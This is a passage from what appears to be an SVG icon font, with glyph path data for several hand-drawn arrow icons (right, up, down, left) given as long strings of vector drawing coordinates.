74-46l-45 44c-1-2-4-4-6-4-1-1-3-1-7 0v-2l-5 3c-2 1-6 3-11 5z m-149-49l-14 6-22 23 22-14c5-3 11-7 16-10l-2-5z m-20 45l-67 35-25 25 19-11c25-14 50-29 76-43l-3-6z m34 17c-114 58-148 75-162 80l-1 0-2 2-3 3 0 0-9 9 2 2 264 264h241l-5-5-251-251c-2-1-2-3-3-4v-1l-1-1c0-1 0-3 0-4l0-3 1-2c1-2 1-3 3-5l63-64-3-4-97 68 3 5c11-5 17-7 19-7 0 0 1 0 1 0 3 1 4 3 5 5v0l0 3-1 2c0 1-1 2-1 2l-14 12c-13 11-27 23-40 34l-19 16 76-38c3-2 8 0 9 3 2 3 2 4-4 10l-1 1c-6 6-17 16-37 33l-17 16 74-38c4-2 8-1 10 2 2 3 1 7-1 9l-63 60 18-10c14-7 28-15 38-20 21-11 28-14 30-14 1 0 1 0 2 0 2 1 3 2 4 4 2 3 2 4-4 10l-2 1c-4 4-11 9-20 17l3 5 33-17c3-2 8 0 9 3 2 3 2 4-4 10l-1 1 0 1c-1 1-2 1-4 2-4 2-10 6-18 18l-3 5 6-1c18-7 27-12 33-15 4-2 7-3 7-3 4 1 5 3 6 4 0 3-1 5-2 7l-62 58 18-9c51-27 64-33 67-33 1 0 1 0 2 0 3 1 4 3 5 6 0 2 0 5-2 6-12 10-26 22-39 34l-19 16 22-11c39-20 52-27 56-27 0 0 1 1 1 1 3 0 4 2 5 5 0 2 0 5-2 7-10 10-23 23-36 36l-13 13 17-9c40-21 51-26 54-26 1 0 1 0 2 1 2 0 3 1 4 3 1 2 1 4 1 6l-13 37 7-4c18-9 25-12 28-13l-3 7 3 8c-7 3-25 13-40 21l-8 4-4-3c-2-2-3-5-2-8l13-38-6 3c-22 11-56 29-82 42l-8 4-3-3c-1-1-1-2-2-2-2-4-2-6 38-46l13-13-17 8c-23 12-49 26-70 37-1 1-3 1-5 0-2-1-4-2-4-3-2-3-2-4 4-10l0-1c6-6 16-15 35-32l19-16-22 11c-40 21-52 27-55 27-1 0-1 0-2 0-2-1-4-3-4-6-1-2 0-5 2-6l62-60-18 10c-21 11-45 23-64 32l0 1c-4 1-8 0-10-3-2-3-1-7 2-9l53-43-66 34c-3 2-8 1-10-3-1-3-2-4 4-9l1-2c5-3 10-8 18-14l-3-5c-22 11-30 15-33 15-1 0-1 0-2 0-2-1-3-2-4-4-1-3-1-6 1-9l61-57-18 9c-48 25-64 33-67 33l-1 0c-2-1-3-2-4-4-2-3-2-4 4-10 3-3 7-7 14-13 6-5 14-12 24-21l18-16-75 39c-3 1-8 0-10-3-1-3-1-4 5-10l0-1c7-7 20-19 49-44l19-16-22 12c-24 11-48 24-68 34-4 3-7 1-9-2-2-3-2-7 2-10l132-94-3-5c-49 25-106 55-153 80-3 1-4 1-6 1-2-1-3-2-4-4-1-3-2-4 4-9l2-1 0-1 2-1c17-14 62-42 171-110l-2-5c-6 3-12 6-18 9l-34 17c-88 45-124 64-139 71l-3 2 0-1-3 1c-3 2-4 2-5 2l-9-15 5 3 2-1 151-89-3-5z m59 76l50-35-39 39c-1 0-1 1-1 1-2-2-4-4-7-5 0 0-1 0-3 0z m-200 36l3-1 5-3c15-6 49-24 129-65-67 42-99 62-112 73-1 0-2 1-4 2l-3 2 1 1c-7 6-7 10-4 15 1 3 4 5 7 6 4 1 6 1 10-1 36-18 77-40 117-60l-99 69c-5 4-7 12-4 18 4 6 12 8 18 4 13-7 29-15 45-23-17 14-25 22-30 28l-1 0c-7 8-7 12-5 17 3 6 11 9 18 6l33-17c-2 2-5 4-7 6-7 6-11 10-14 12-8 9-8 12-5 18 2 3 4 5 8 6 0 0 1 1 2 1 4 0 9-3 52-24l-31 29c-5 4-6 10-3 15 1 4 4 6 8 7 1 0 2 1 3 1 2 0 5-1 12-4l0 1c-7 7-6 10-4 15 3 6 12 9 18 5l14-7-8 6c-5 5-6 12-3 18 4 5 11 7 17 4l0 0c14-7 30-15 47-24l-33 31c-4 4-5 8-4 13 1 4 4 8 9 9 1 1 2 1 3 1 4 0 9-2 37-17-9 8-14 13-17 16l-2 2 0 1c-7 7-7 11-4 15 1 3 4 6 7 7 4 1 7 0 10-1 16-9 35-19 54-28-26 27-29 32-26 38h-31l-261-261 5-5 15 23 1 1c1 0 3 0 7-1l0 0z m-15-28c10-4 31-14 74-36l-68 40-6-4z m187 45c8-6 15-13 22-19l12-10 0 0v1l0 1c1 2 3 4 4 6l5 4c-4-1-8-1-11 1l-32 16z m46 5c6-7 6-10 4-15l17 18c-3-1-7-1-10 0l-33 17c9-8 15-14 19-18l3-1 0-1z m-7 55l33-30c4-4 5-10 3-15l20 21c0 0 0 0-1 0-1-1-2-1-3-1-4 0-8 2-33 15-5 3-12 6-19 10z m59-2c7-7 7-10 5-15l12 13c-3-2-8-2-11 0l-9 4 1 0 2-1 0-1z m20 19c6-7 6-10 4-15l15 15c-1 0-2 0-3-1-3-1-4 0-12 4-4 2-11 6-22 11 4-4 7-6 10-7 2-1 3-2 5-4l3-2 0-1z m-10 50l31-30c4-3 5-7 4-12 0-1 0-1-1-2l22 21c-1 0-1 0-1 0-1 0-2-1-4-1-4 0-11 3-51 24z m39 17c7-7 14-13 20-18 4-3 5-8 4-12 0-1 0-2 0-3l17 18c0-1-1-1-1-1-1 0-2 0-3 0-4 0-10 2-37 16z m22 29c9-8 16-16 23-23 4-4 5-8 4-12 0-1-1-2-1-2l20 19-1 0c-1 0-2-1-3-1-4 0-10 2-42 19z m46 22l7-24c1-3 1-6 0-9l23 23-1 0c-2-1-3-1-4-1-4 0-8 2-25 11z m28 2l3-10 39 39h-73c16-9 30-16 32-17l2-1-3-11z m-119 29c21-11 46-24 64-33l-8 24c-1 3-1 6 0 9 0 0-56 0-56 0z" />
<glyph glyph-name="hand-drawn-alt-right" horiz-adv-x="1000" unicode="&#xea84;" d="M503 50h-280c-8 0-16 5-19 12-3 8-1 16 5 22l266 266-265 265c-4 3-7 9-7 15 0 11 8 20 19 20h281c5 0 10-2 14-6l281-281v-26l-1-1-280-280c-4-4-9-6-14-6z m-282 594c-7 0-13-6-13-14 0-4 3-8 6-11l269-269-2-2-268-268c-4-4-5-10-3-16 2-5 7-8 13-8h280c3 0 7 1 9 4l280 279v22l-280 279c-2 3-6 4-9 4h-282z m276-560h-17l12 5 5 3 17 9-17-17z m-48 0h-31l11 5c9 5 20 10 34 18l42 22 3-5c-20-14-41-28-59-40l0 0z m-7 5h5c5 4 11 8 16 11-8-4-15-7-21-11z m-56-5h-41l161 82 3-6-77-48c-21-13-34-21-42-26-1-1-2-2-3-2l-1 0z m-16 5h15c1 1 1 1 2 2 8 5 20 13 42 26l20 13-79-41z m-56-5h-30l10 5c8 4 17 8 28 15 24 12 58 29 97 50l3-5c-65-38-91-54-104-63l-4-2z m-6 5h5l2 2c4 3 9 6 16 11-2-2-4-3-6-4-6-3-12-6-17-9z m-49-3l74 74 1-4c1 0 1-1 1-1 1-2 2-3 4-4 2 0 5 1 8 2 11 5 35 17 90 45l3-5-181-107z m72 64l-36-35 65 38c-4-2-8-4-10-5-6-2-8-3-10-3-1 0-2 0-2 0-3 1-6 3-7 5z m26 26l-4 5 72 71 1-5c0 0 0-1 0-1 1-2 2-3 4-4 0 0 1 0 1 0 1 0 3 1 6 2l1 0c9 4 29 13 61 29l3-5c-79-49-123-76-145-92z m65 65l-45-44c18 11 42 26 74 46-5-2-8-4-11-5l-5-4 0 3c-4-1-6-1-7-1-2 1-5 3-6 5z m179-47l-3 5c5 3 11 7 16 10l22 14-23-23-12-6z m19 45l-3 6c26 14 51 29 76 43l19 11-26-26-66-34z m-34 17l-3 5 153 90 5-3-9 15c-1 0-2 0-5-2l-3-1 0 1-2-2c-16-7-52-26-140-71l-34-17c-6-3-12-6-18-9l-3 5c110 68 155 96 172 110 1 0 2 1 2 1l0 1 2 1c6 5 5 6 4 9-1 2-2 3-4 4-2 0-3 0-6-1-47-25-104-55-153-80l-3 5 133 94c3 2 3 7 2 10-2 3-7 4-10 2-20-10-44-23-67-35l-23-11 19 16c29 25 43 37 49 44l1 0c5 7 5 8 4 10-2 4-7 5-10 3l-75-38 18 16c10 9 18 16 24 21 7 6 11 10 14 13 6 6 6 7 4 10-1 2-2 3-4 3-1 1-1 1-1 1-3 0-19-8-67-33l-18-9 61 57c2 3 3 6 1 9-1 1-2 3-4 3-1 1-1 1-2 1-3 0-11-4-33-15l-3 5c9 7 14 11 18 15l1 0c6 6 5 7 4 10-2 3-6 5-10 3l-66-33 53 42c3 2 4 6 2 9-2 3-6 4-9 3l-1 0c-19-10-42-22-64-33l-18-10 63 60c1 1 2 4 2 6-1 3-3 5-5 6-1 0-1 0-2 0-3 0-15-6-55-27l-22-11 19 16c20 17 29 26 35 32l1 1c5 6 5 7 4 10-1 1-3 3-5 3-1 1-4 0-5 0-21-11-47-25-70-37l-17-8 13 13c40 40 40 42 38 46-1 0-1 1-2 1l-3 4-8-4c-26-13-60-31-82-42l-6-3 13 38c0 3 0 5-2 7l-4 4-8-4c-15-8-33-18-40-21l3-8-3-7c3 1 10 4 28 13l7 4-13-38c0-1 0-3 1-5s2-3 4-3c1-1 1-1 2-1 3 0 14 5 54 26l17 9-13-13c-13-13-25-26-36-36-2-2-3-5-2-7 1-3 2-5 5-5 0 0 1-1 1-1 4 0 17 7 56 27l22 11-18-16c-14-12-28-24-39-33-2-2-3-5-3-7 1-3 3-5 5-6 1 0 1 0 2 0 4 0 16 6 67 33l18 10-61-59c-2-2-3-4-2-7 0-1 1-3 5-4h0c1 0 3 1 7 3 6 3 16 8 33 15l1 1h6l-3-5c-8-12-14-15-19-18-2-1-3-1-4-2l0-1-1-1c-6-6-6-7-4-10 1-3 6-5 9-3l33 17 3-5c-10-8-17-14-21-18l-1 0c-6-6-6-7-4-10 1-2 3-3 4-4 1 0 2 0 2 0 2 0 9 3 30 14 10 5 24 13 38 20l18 10-62-60c-3-2-3-6-1-9 2-3 5-4 9-2l74 38-17-16c-20-17-31-27-37-33l-1-1c-6-6-6-7-4-10 1-3 6-5 9-3l76 39-19-16c-13-12-27-24-40-35l-14-12c0 0-1-1-1-1l-1-3 0-3 0 0c1-2 2-4 5-5 0 0 0 0 1 0 2 0 8 2 19 7l3-5-97-68-4 4 64 64c1 1 2 3 3 5l1 2 0 3c0 2 0 3-1 5l0 1c-1 1-2 3-3 4l-256 257h241l1-1 265-266-9-9 0-1-5-4-1 0c-14-5-48-22-162-80z m-69 81c0 0 0-1 0-1l-40-39 50 35c-1 0-2 0-3 1-3 0-5 2-7 4z m192 40l0-1-3-2c-1-1-3-1-4-2-13-11-45-31-112-73 80 41 114 59 129 66l8 4 0-1c4 1 6 1 7 1l1-1 1-1 14-22 5 5-260 261h-31c2-6 0-11-27-38 19 9 38 19 54 28 3 1 7 2 10 1 3-2 6-4 8-7 2-4 2-7-4-15l0-1-3-2c-3-3-8-8-16-16 27 15 32 17 36 17 1 0 2 0 3-1 5-1 8-5 9-9 1-5 0-9-4-13l-32-31c16 8 32 17 46 24l1 0c5 3 12 1 16-5 3-5 2-13-3-17l-8-6 14 7c7 4 15 1 18-5 3-5 3-9-4-16l0 0 0 0c7 3 10 4 12 4 2 0 3-1 4-1 3-1 6-4 7-7 3-5 2-11-2-15l-31-29c42 22 47 24 51 24 1 0 2-1 3-1 3-1 6-3 7-6 3-6 3-9-5-18-3-3-7-6-14-12-2-2-4-4-7-6l33 17c7 3 15 0 18-6 3-5 2-8-5-17l-1 0c-5-6-13-14-30-28 16 8 32 17 45 24 2 1 4 1 6 1 5 0 9-2 11-6 4-6 2-14-3-17l-99-70c40 20 81 42 117 60 4 2 7 2 10 1 3-1 6-3 7-6 3-5 3-9-3-15z m27-33l-68-40c43 22 64 32 75 36l-7 4z m-215 12l0 0 12 10c7 6 14 13 22 19l-32-16c-3-2-7-2-11-1l4-4c2-2 4-4 5-6l0 0 0-2z m-33 37l17-17c-2 4-1 7 4 14l0 0 3 2c4 4 10 10 19 18l-33-17c-3-1-7-1-10 0z m-28 28l20-21c-2 5 0 11 4 15l32 30c-7-4-14-7-19-10-25-13-29-15-33-15-1 0-2 0-3 1-1 0-1 0-1 0z m-20 19l13-12c-3 5-3 8 4 15l0 1 2 1 1 0-9-4c-3-2-7-2-11-1z m-22 22l15-15c-2 5-1 8 5 15l-1 0 2 2 1 1c2 1 3 2 5 3 3 2 6 3 10 7-11-5-18-8-22-10-8-4-9-5-12-4-1 1-2 1-3 1z m-27 27l22-21c-1 1-1 1-1 2-1 4 0 9 4 12l31 30c-40-21-47-24-51-24-2 0-3 0-4 1 0 0 0 0-1 0z m-24 25l17-18c0 1 0 2 0 3-1 4 0 9 4 12 6 5 13 11 20 18-26-14-33-16-37-16-1 0-2 0-3 0 0 0-1 0-1 1z m-27 26l20-19c0 0 0 1-1 2-1 4 1 8 4 12 7 7 15 15 23 23-32-17-37-19-41-19-2 0-3 1-4 1 0 0 0 0-1 0z m-29 30l22-23c-1 3-1 6 0 9l7 24c-17-9-21-11-25-11-1 0-2 0-4 1l0 0z m-41 41l39-39 3 10-3 11 2 1c3 1 16 8 32 17l-73 0z m105 0c1-3 1-6 0-9l-8-24c18 9 43 22 64 33h-56z" />
<glyph glyph-name="hand-drawn-alt-up" horiz-adv-x="1000" unicode="&#xea85;" d="M220 53c-11 0-20 8-20 19v281c0 5 2 10 6 14l281 281h26l1-1 280-280c4-4 6-9 6-14v-280c0-8-5-16-12-19-8-3-16-1-22 5l-266 266-265-265c-3-4-9-7-15-7z m-14 18c1-7 6-13 14-13 4 0 8 3 11 6l269 269 2-2 269-268c3-4 9-5 15-3 5 2 8 7 8 13v280c0 3-1 7-4 9l-279 280h-22l-279-280c-3-2-4-6-4-9v-280l1-1-1-1z m28 35v241l0 1 266 265 9-9 1 0 4-5 0-1c5-14 22-48 80-162l-5-3-90 153 3 5-15-9c0-1 0-2 2-5l1-3-1 0 2-2c7-16 26-52 70-140l18-34c3-6 6-12 9-18l-5-2c-68 109-96 154-110 171l-1 2 0 0-2 2c-4 4-5 5-6 5-1 0-2 0-3-1-2-1-3-2-3-4-1-2-1-3 0-6 27-50 57-108 80-153l-5-3-94 133c-2 3-6 3-10 2-1-1-3-3-3-5 0-1 0-3 1-5 10-19 23-44 35-67l11-23-16 19c-25 29-37 43-44 49-4 4-6 6-8 6 0 0-1-1-2-1-4-2-5-6-3-10l38-75-16 18c-9 10-16 18-21 24-6 7-10 11-13 14-3 3-6 5-7 5-1 0-2 0-3-1-2-1-3-2-3-4-1-3 1-9 32-68l9-18-57 61c-3 2-6 2-9 1-2-1-3-2-4-4 0-3-1-4 15-35l-5-3c-7 9-11 14-15 18l0 1c-4 3-6 5-7 5-1 0-2-1-3-1-4-2-5-6-3-10l33-66-18 23c-8 10-17 21-24 30-2 3-7 4-10 2-3-2-4-6-2-9l1-3c10-19 22-41 32-62l9-18-59 62c-2 2-4 3-7 2-2 0-4-2-5-4-1-4 0-5 27-57l11-22-16 19c-17 19-26 29-32 34l-1 1c-3 4-6 5-7 5-1 0-1 0-2-1-2-1-3-2-4-4-1-2 0-4 0-5 11-21 25-47 37-70l8-17-13 13c-27 27-39 38-43 38-1 0-1 0-3 0 0-1-1-1-1-2l-4-4 4-7c13-26 31-60 42-82l3-6-38 13c-3 0-6 0-7-2l-4-4 4-8c7-13 17-33 21-40l8 2 7-2c-1 3-4 9-13 28l-4 6 37-12c2 0 4 0 6 1 2 1 3 2 3 4 1 3 1 6-25 56l-9 17 13-13c13-13 26-26 36-36 2-2 5-3 7-2 2 0 4 2 5 5 1 3 0 6-26 57l-11 22 16-19c12-13 23-27 33-39 2-2 5-3 7-2 3 1 5 2 6 5 1 4-1 7-33 68l-10 19 59-62c2-1 4-2 7-2 1 1 3 2 4 5 0 1 0 2-3 8-3 5-8 15-15 33l-1 1v5l5-3c12-8 15-14 18-18 1-2 1-3 2-4l1-1 1 0c3-4 6-5 7-5 1 0 2 0 3 1 2 0 3 2 3 4 1 2 1 3 0 5l-17 33 5 3c8-10 14-17 18-22l0 0c4-4 6-5 7-5 1 0 2 0 3 1 2 1 3 2 4 4 1 3 1 3-14 32-5 10-13 23-20 37l-10 19 60-63c2-2 6-3 9-1 2 2 3 4 3 6 0 1 0 2-1 3l-38 75 16-18c17-19 27-31 33-37l1 0c4-4 6-6 7-6 1 0 2 1 3 1 4 2 5 7 3 10l-38 76 16-19c11-12 22-26 32-38l14-16c0 0 1-1 2-1l2-1 2 0h1c2 1 4 2 5 5 0 1 1 3-7 20l5 3 68-97-4-3-64 64c-1 1-3 2-5 2l-2 1-3 1c-2 0-3-1-4-1l-1-1h0c-2 0-3-1-5-2l-256-257z m5 87v-73l40 39-11 3-11-3-1 2c-1 2-8 16-17 32z m31-2c12-23 12-24 10-29l0-1 23 22c-3-1-6-1-9 0l-24 8z m22 45c20-39 20-40 18-45 0 0 0 0 0-1l20 20c-1 0-2-1-2-1-5-1-9 1-13 4-7 7-14 15-23 23z m29 22c18-34 17-35 16-40 0 0 0-1 0-1l17 17c-1 0-2 0-3 0-4-1-9 0-12 4-5 6-11 13-18 20z m-77-32c1 0 3 0 4-1l24-8c-9 18-22 43-33 64v-56c2 0 3 1 5 1z m94 71c25-48 25-49 23-55 0 0 0 0 0-1l21 22c-1-1-1-1-2-1-4-1-9 0-12 4l-30 31z m37 8c5-11 8-18 10-22 4-8 5-9 4-12-1-1-1-2-1-3l15 15c-4-1-8-2-15 4l0 0-2 2-1 1c-1 2-2 3-3 5-2 3-3 6-7 10z m-132 9c5 0 10-3 34-27-9 19-19 38-28 54-1 3-2 6 0 10 1 3 3 6 6 8 1 0 3 1 5 1 3 0 6-1 10-5l1 0 2-3c4-3 8-8 16-16-18 34-18 34-16 40 1 4 5 7 9 8 5 1 9 0 13-3l31-33c-8 15-16 30-22 43l-2 4c-3 6-1 12 4 16 6 3 14 2 18-3 2-3 4-5 6-8l-7 15c-2 3-2 6-1 10 1 3 3 6 6 7 2 1 4 2 6 2 3 0 5-2 9-5l1 0v0c-4 9-4 12-3 15 1 3 3 6 7 8 4 2 11 1 15-3l29-31c-25 49-24 50-23 54 1 3 3 6 6 7 2 1 4 2 6 2 3 0 6-2 12-7 3-3 6-7 12-14 2-2 4-4 6-7l-17 34c-3 6 0 14 6 17 2 1 3 2 5 2 3 0 7-2 12-7l0 0c6-5 14-14 28-31-8 17-16 32-23 46-2 2-3 5-2 9 1 3 3 6 6 8 6 3 14 2 18-3l69-99c-19 37-40 79-60 116-1 3-2 6-1 10 1 3 3 6 6 8 2 1 4 1 6 1 2 0 5-1 9-5l1 1 4-7c11-14 31-45 73-113-41 80-59 115-65 129l-5 8 1 0c-1 4-1 6-1 8l1 1 1 0 22 14-5 5-261-260v-31c1 0 3 0 4 0z m162-4l4-9c2-3 2-6 1-10 0 0 0-1 0-1l12 12c-4-2-8-2-15 5l0 0-2 2c0 1 0 1 0 1z m0 56c4-7 7-14 10-19 16-31 16-31 15-36-1-1-1-1-1-1l21 20c-5-1-11 0-14 4l-31 32z m108 1l1 0 39-40-35 50c0-1 0-2 0-3-1-3-3-5-5-7z m-73 14l17-33c1-2 1-4 1-6 0-1 0-3-1-4l18 17c-2-1-3-1-5-1-2 0-5 1-10 5l0 0-2 3c-4 4-10 10-18 19z m25 24l16-32c2-3 2-7 1-11l4 5c2 1 4 3 6 4l1 0h0c1 0 1 0 1 0l-12 14c-5 6-11 13-17 20z m41 181l40-68c-22 43-32 64-36 75l-4-7z m258-477l-74 74 4 1c0 0 1 1 2 1 1 1 2 2 3 4 0 1 0 1 0 1 0 1-1 3-2 7-5 11-17 35-45 90l5 3 107-181z m-64 72l35-36-38 65c2-4 4-8 5-10 3-6 3-8 3-10 0-1 0-2 0-2-1-3-3-6-5-7z m67-47l-6 10c-4 8-8 17-14 28-13 24-30 58-51 97l5 3c38-65 54-91 63-104l2-5 1-29z m-18 47c1-2 2-4 3-6 3-6 6-12 9-17v5l-2 2c-2 4-6 9-10 16z m18 15l-82 161 5 2 49-79c13-20 20-32 26-40 1-1 1-2 1-3l1-1 0-40z m-47 103l41-79v15c-1 1-1 1-1 2-6 7-13 19-26 40l-14 22z m-51-96l-71 72 6 1c2 1 3 2 4 4 0 1 0 2-1 7l-1 2c-5 11-14 30-29 60l5 3c51-82 77-123 92-145l-5-4z m-60 69l44-45c-11 18-25 41-46 74 2-5 4-9 5-12l3-4h-2c1-4 1-5 1-7-1-2-3-5-5-6z m158-4l-6 11c-5 10-12 24-21 41l-18 35 5 3c12-18 25-37 36-54l4-5 0-31z m-17 45c4-8 7-15 11-21v5l-3 4c-3 4-5 8-8 12z m17 17l-6 12-2 4-9 18 17-17v-17z m-116 118c-3 5-7 11-10 16l-14 22 23-23 6-12-5-3z m-45 19c-15 26-30 51-44 76l-11 19 26-26 34-66-5-3z" />
<glyph glyph-name="hand-drawn-down" horiz-adv-x="1000" unicode="&#xea86;" d="M217 648c-9 0-17-8-17-17 0 0 0-1 0-1v-283c0-4 2-8 5-12l283-282h24l283 282c3 4 5 8 5 12v283c0 7-4 13-10 16-7 3-14 1-19-4l-271-271-269 269c-3 5-8 8-14 8z m456-151c-15-23-42-66-93-148 19 38 27 55 30 64l0 0c3 6 2 7 2 9-1 2-3 4-5 6-1 0-2 0-2 0l68 69z m79 78l-96-163c29 57 41 80 45 91 3 5 3 7 3 9 0 0 0 1 0 1-1 3-3 5-5 6-1 0-2 1-2 1l55 55z m13-40c-10-13-28-42-64-105 20 40 38 74 51 98 6 12 10 21 14 28v-18l-1-3z m-2-184c1 2 2 4 3 6v-3l-3-3z m-37-8c5 10 10 20 15 29 11 21 19 37 25 49v-18c-12-18-26-39-40-60z m-37-1l77 152v-29c0 0 0-1-1-2-6-9-15-23-30-46l-46-75z m-182-40c9 19 9 20 8 23-1 4-4 6-8 7h0c1 1 3 2 5 3l64 65-69-98z m138-69c3 6 7 11 10 17-2-5-4-9-6-13l-4-4z m-80-80c14 25 29 51 44 77l-34-67-10-10z m-55-54l-7 13 89 152c-58-113-76-151-81-165l-1 0 0 0z m-276 293c1 0 2-1 3-2 6-3 7-3 49 39-12-24-26-51-36-71-2-2-2-5-1-8 1-3 3-5 5-6 3-2 5-3 13 5l1-1 0 2c7 5 16 16 33 35-29-55-29-55-27-60 1-3 4-6 7-6 4-1 7 0 10 2l45 49c-11-22-23-47-33-66-3-4-1-10 3-13 5-3 11-2 14 3 7 9 16 20 24 30l-20-40c-3-5-1-11 4-14 4-2 6-3 13 5l1-1 0 1c4 4 8 10 15 19-16-33-16-34-15-38 1-2 3-4 6-6 4-2 8-1 12 3l43 46c-34-67-33-67-32-71 0-2 2-4 5-6 4-2 6-3 14 5 3 3 7 8 12 14 6 6 13 14 22 25l-28-55c-2-5 0-11 5-14 3-1 5-2 13 5l1 1c7 7 20 21 44 49-12-23-25-48-35-68-3-5-1-11 3-14 5-2 11-1 14 3l95 134c-26-50-56-108-81-155-1-2-1-5 0-8 0-2 2-4 5-5 3-2 5-3 12 4l1 0 3 5c13 17 42 63 111 173l-10-18c-58-114-80-157-88-175l-4-5 1-1c-2-5-2-6-1-8l25-15-10-10-266 266 0 37z m10 87l32 10c-11-21-29-56-42-82v75c3-3 7-4 10-3z m-10 110l254-254c2-1 4-2 6-3h0c2-1 4-1 7-1-1-1-3-1-3-2-14-16-31-36-47-55l28 54c2 5 0 11-5 14-4 2-5 3-13-5l-1 0 0-1c-6-6-17-17-34-37 9 18 19 38 28 54 0 2 1 3 1 5 0 3-2 6-5 8-4 3-9 2-13-1l-45-48c7 14 14 28 20 38 15 30 15 30 14 34-1 3-3 5-5 6-4 2-6 3-14-5h0c0 0 0 0 0-1-4-4-10-11-18-21l17 33c2 5 0 11-5 13-3 2-5 3-13-4l-1 0-1-2c-4-4-3-11-20-22 17 38 20 40 19 43-1 3-3 6-7 7s-7 0-9-3l-45-47c35 67 35 67 33 72-1 3-4 6-8 7-3 0-7-1-9-4-10-11-22-25-34-39 28 55 28 56 26 60-1 4-3 6-7 7-3 1-7 0-9-2-11-11-24-24-37-37 28 54 28 55 26 60-1 2-2 4-5 5-2 2-5 2-8 1l-30-10c15 29 15 29 13 34l-9-3-10 3c-1-3-12-24-22-43l0 92z" />
<glyph glyph-name="hand-drawn-left" horiz-adv-x="1000" unicode="&#xea87;" d="M800 636c0 9-8 17-17 17 0 0 0 0-1 0h-285c-4 0-9-2-12-5l-285-286v-24l285-285c3-3 8-5 12-5h286c7 0 13 4 15 10 3 7 2 14-3 19l-274 273 272 272c4 3 7 8 7 14z m-152-461c-23 16-67 43-149 94 38-19 55-27 64-30l0 0v0c6-2 8-2 9-2 3 1 5 3 6 5 0 1 0 2 0 3l70-70z m79-79l-164 97c57-29 81-41 91-46 6-2 8-3 9-3 1 0 1 0 2 1 2 0 4 2 6 5 0 0 0 1 0 2l56-56z m-40-13c-14 10-43 28-106 65 40-21 75-39 98-52 12-6 21-10 29-14h-18l-3 1z m-186 2c2-1 4-2 6-3h-3l-3 3z m-8 37c10-5 20-10 29-15 21-11 37-19 49-25h-18c-18 12-39 26-60 40z m-1 38l153-78h-29c0 0-1 0-2 1-9 6-23 15-47 30l-75 47z m-40 183c18-9 20-9 23-8 3 1 6 4 7 8l0 0c0-2 2-3 3-5l65-65-98 70z m-70-139c6-3 11-7 17-10l-13 6-4 4z m-80 80c25-14 51-29 77-44l-67 35-10 9z m-56 56l14 7 154-90c-115 59-153 77-167 82l-1 1c0 0 0 0 0 0z m297 278c-1 0-2-1-2-2-3-6-4-8 38-50-24 12-50 26-71 37-2 1-6 1-8 0-3 0-5-2-6-5-2-3-3-5 4-13l0 0 1-1c6-6 17-16 36-33-55 29-55 29-60 28-4-2-6-4-7-8-1-3 0-7 3-10l48-46c-22 12-46 24-65 34h0c-5 2-11 1-13-3-3-5-2-11 2-14 9-7 20-16 31-25l-41 21c-5 3-11 1-14-4-2-4-3-6 5-14l0 0 1-1c3-3 9-8 18-15-33 17-34 16-38 15-2-1-4-3-6-5-2-4-1-9 2-12l47-44c-67 34-68 34-71 33-3-1-5-3-6-5-2-4-3-6 5-14 3-4 7-8 14-13 6-6 14-13 25-22l-55 28c-5 3-12 1-14-4-2-4-3-6 5-14l0-1c7-7 22-20 50-44-24 12-49 25-69 35-4 3-11 1-13-3-3-5-2-11 2-14l136-96c-51 26-110 57-157 82-3 1-5 1-8 0-2-1-4-2-6-5-1-3-3-6 5-13l0-1c1 0 3-1 4-2 18-14 64-42 175-112-6 3-12 6-18 10-115 58-159 81-176 89l-6 3 0-1c-6 3-7 2-8 2l-16-26-10 10 268 268h39z m87-10l10-32c-22 11-57 29-82 42h75c-3-2-4-6-3-10z m111 10l-256-256c-2-2-3-4-4-6l0 0c0-2-1-4-1-6 0 1-1 2-2 3-16 13-36 30-55 47l55-28c5-3 11-1 13 4 2 4 3 6-4 14l0 0-1 0c-6 7-18 17-38 35 18-10 38-20 55-28 1-1 3-1 4-1 4 0 7 1 9 4 3 4 2 10-2 14l-48 45c14-7 28-14 38-20 31-16 31-16 35-14 3 1 5 2 6 5 2 4 3 6-5 14l0 0c0 0 0 0 0 0-5 4-12 10-22 18l33-17c5-2 11 0 14 5 2 3 3 5-5 13l0 1-1 1c-5 4-12 3-23 20h0c39-17 40-20 44-19 3 1 6 3 7 7 0 4-1 7-3 10l-48 45c67-35 68-35 72-34 4 1 7 4 7 8 1 4 0 7-3 10-12 10-26 22-40 34 56-29 57-28 61-27 4 1 6 4 7 7 1 4 0 8-3 10-10 11-24 24-36 37 54-28 55-28 60-26 2 0 4 2 6 5 1 2 1 5 0 7l-10 31c29-15 30-15 34-13l-3 9 3 10c-3 1-24 12-43 22l93 0z" />
<glyph glyph-name="hand-drawn-right" horiz-adv-x="1000" unicode="&#xea88;" d="M207 622l272-272-274-273c-5-5-6-12-3-19 2-6 9-10 15-10h286c4 0 9 1 12 5l285 285v24l-285 286c-3 3-8 5-12 5h-286c0-1 0-1 0 0-9 0-17-8-17-18 0-5 3-10 7-13z m169-423l46 46c0-1-1-2 0-3 1-2 3-4 6-5 1 0 3 0 9 2v0l0 0c8 3 26 11 64 30-82-51-126-78-149-94l24 24z m-76-76l29 29c0-1 0-2 0-2 2-3 4-5 6-5 1-1 1-1 2-1 1 0 3 1 9 3 10 5 34 17 91 46l-164-97 27 27z m10-41h-18c7 4 17 8 29 15 23 12 58 30 98 51-63-37-92-55-106-65l-3-1z m186 0h-3c2 1 4 2 6 3l-3-3z m-49 0h-18c12 6 28 14 49 25 9 5 19 10 29 15-21-14-42-28-60-40z m-14 31c-24-15-38-24-46-30-2-1-3-1-3-1h-29l153 78-75-47z m17 160l65 65c1 2 2 3 3 5l0 0c1-4 4-7 7-8 3-1 4-1 23 8l-98-70z m164-73l-13-6c6 3 11 7 17 10l-4-4z m74 74l-67-34c26 15 52 30 77 44l-10-10z m65 66l0 0c-14-6-52-24-167-83l154 91 14-8-1 0z m-257 278l268-268-10-10-16 26c-1 0-2 1-8-2l0 1-6-3c-17-8-61-31-176-89l-18-10c111 70 157 98 175 112 1 1 3 2 4 2l0 1c8 7 6 10 5 13-2 3-4 4-6 5-3 1-6 1-8 0-47-25-106-56-157-82l135 96c5 3 6 9 3 14s-9 6-13 3c-20-10-45-23-69-35 28 24 43 37 50 45l0 0c8 8 7 10 5 14-3 5-9 7-14 4l-55-28c10 9 19 16 25 22 6 5 11 10 14 13 8 8 7 10 5 14-1 2-4 4-6 5-4 1-4 1-71-33l46 44c4 3 5 8 2 12-1 3-3 4-6 5-3 1-5 2-37-15 8 7 14 12 18 16l1 0 0 0c8 8 7 10 5 14-3 5-9 7-14 4l-41-21c11 9 21 18 31 25 4 3 5 9 2 14-3 4-8 6-13 3h0c-19-10-44-22-66-34l49 46c2 3 4 7 3 